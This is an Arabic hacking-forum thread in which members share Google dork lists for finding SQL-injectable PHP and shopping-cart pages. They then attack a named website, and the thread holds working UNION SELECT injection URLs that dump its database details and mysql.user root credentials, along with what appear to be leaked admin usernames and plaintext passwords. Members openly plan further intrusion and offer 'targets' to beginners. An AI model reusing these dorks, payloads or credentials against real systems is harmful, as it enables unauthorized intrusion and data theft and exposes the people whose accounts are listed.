غرفة حقن قواعد البيانات {غرفة Sql }

[Master vbspiders]

New sql injection dork

[align=center]دوركات جديدة من نوعها...
بالتوفيق

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

وهذه دوركات لشوبينغ

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?TextID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=

نريد هدف جديد عن طريق هالدوركات
^_*
تحياتي















[/align]

 

[darkman.dz]

Master vbspiders
شكرا أخي
الكريم

 

[medoo_mohamed]

الهدف الجديد

http://www.adas-fusion.eu

 

[medoo_mohamed]

هناك اربع قواعد بيانات لهذا الموقع اعتقد موقع استضافة

 

[darkman.dz]

جاري بإذن الله

 

[darkman.dz]

أخي العزيز medoo_mohamed
أعجبتني بعض الأشياء في هذا الهدف
وهي
1- هناك root
2- الموقع خفيف التصفح جدا
3- يحمل علم الإتحاد الأوروبي ههههههههههههههههههههههههههه
جاري المتابعة + هناك طريقة حقن جديدة ههههههههههه أنا أطبقها الآن

 

[medoo_mohamed]

ههههههههه فعلا علم الاتحاد الاوروبىلوحدة يغيظ علشان كده نشتغل عليه بذمة شوية هههههههههه

وجود الروت بتاعه عاجبنى بس للاسف باسوورد الروت مش راضى يطلع معرفش ليه

 

[darkman.dz]

تفضل أخي العزيز

http://www.adas-fusion.eu/theme.php?id=-4 UNION SELECT 1,2,3,group_concat(database(),0x3a,user(),0x3a,@@version),5,6--

database =  adas_eu 
user = root@localhost
version = 5.0.45

tables =  task,theme,workpackage
=======================================
columns of "  workpackage " = id,theme,shortname,code,name,objective
columns of "theme"                  = id,code,shortname,name,description,science
columns of "task"                     = id,workpackage,shortname,description,revision,experiment,repeatnumber

والحقنة الأخيرة أتركها لكم لتركيبها كما تشاؤون وتتمكنو من تصفح كل العمواميد لأني  وضعت كل  نواتج إستعلامات الأعمدة 
وشكرا

 

[darkman.dz]

هاته النتائج أنا طلعتها بواسطة طريقة حقن جديدة
هههههههههههههههههههههههههههههههههههههههه

 

[darkman.dz]

medoo_mohamed
أخي العزيز
أنا طلعت أشياء أخرى بطريقة أخرى
وجاري وضع الإستغلال كامل
------------------------
يوم رمضان هذا و الله مبارك علي
هههههههههههههههههه
تعلمت حوالي 50 شيئ في ظرف 3 ساعات

 

[medoo_mohamed]

احسنت اخى على الحقن بطرق جديدة ان شاء الله فى تقدم

وان شاء الله يستفيد الاعضاء اللى يدخلوا الموضوع ونستفاد معاهم

 

[darkman.dz]

medoo_mohamed
أخي العزيز
لم التالي
1- سحب باسوورد ويوزر الأدمن
2- الأعضاء ال 5 اللي معاه (ربما أدمن حتى هم )
3- إيجاد الهوست و الباس و اليوز للدحول بحساب root
هههههههههههههههههههههههههههههههههههههههههههههههه
الحمد لله
الآن أنا ذاهب في المساء سأعود وتكون النتائج أمامك
لأني مازال ملخمنتش لوحة التحكم + جاري الإطلاع على المواقع اللي على هذا السيرفر قبل عمل أي خطوة
لنا عودة في المساء بعد الإنتهاء من الرياضة
أنا خارج الآن

 

[medoo_mohamed]

وانا متواجد الليلة ان شاء الله وفيه اهداف جديدة

ترجع بالسلامة يا غالى

 

[darkman.dz]

تفضل أخي
الحقنة التي وعدتك بها

mantis_user_table:password:bugtracker
mantis_user_table:lost_password_request_count:bugtracker
user:password:cvs
user:Password:mysql
user:password:openuser
==============================
**********************************************************
**mantis_user_table:password:bugtracker**
**********************************************************
mantis_user_table:id:bugtracker
mantis_user_table:username:bugtracker
mantis_user_table:realname:bugtracker
mantis_user_table:email:bugtracker
mantis_user_table:password:bugtracker
********************************
***user:password:cvs***
********************************
user:id:cvs
user:fullname:cvs
user:username:cvs
user:password:cvs
user:auth:cvs

**************
for root****
**************
user:Host:mysql
user:User:mysql
user:Password:mysql

*************************************************
account of admin and the moderators
1:allan:apple123
2:oli:fefeef
3:mog:gom
4:nicholas:lom456ond
5:afoster:ofa
6:summers:mus
************************************

وهاته حقنة الحصول على حساب ال root

http://www.adas-fusion.eu/workpackage.php?id=-1%20UNION%20SELECT%201,2,3,4,concat%28user,0x3a,password%29,6+from+mysql.user--

:Great:

 

[darkman.dz]

+ أنا تفحصت الموقع
هوفقط المركب على السيرفر المحلي
بالإصاقة إلى موقعين أو ثلاثة تابعة لنفس الموقع

 

[Master vbspiders]

[align=center]ما يجيبها الا رجالها ابطال والله...
واصلو
تحياتي[/align]

 

[NeTCaT-Ma]

السلام عليكم شباب ممكن هدف سهل أتعلم عليه

 

[Master vbspiders]

السلام عليكم شباب ممكن هدف سهل أتعلم عليه

[align=center]جاري البحث...
تحياتي[/align]

 

[darkman.dz]

السلام عليكم شباب ممكن هدف سهل أتعلم عليه

back to the old targets
and try to injecting it again
that's so easy to do
for can know your mistake
and for learn more about that

 

[NeTCaT-Ma]

شكرا لك أخي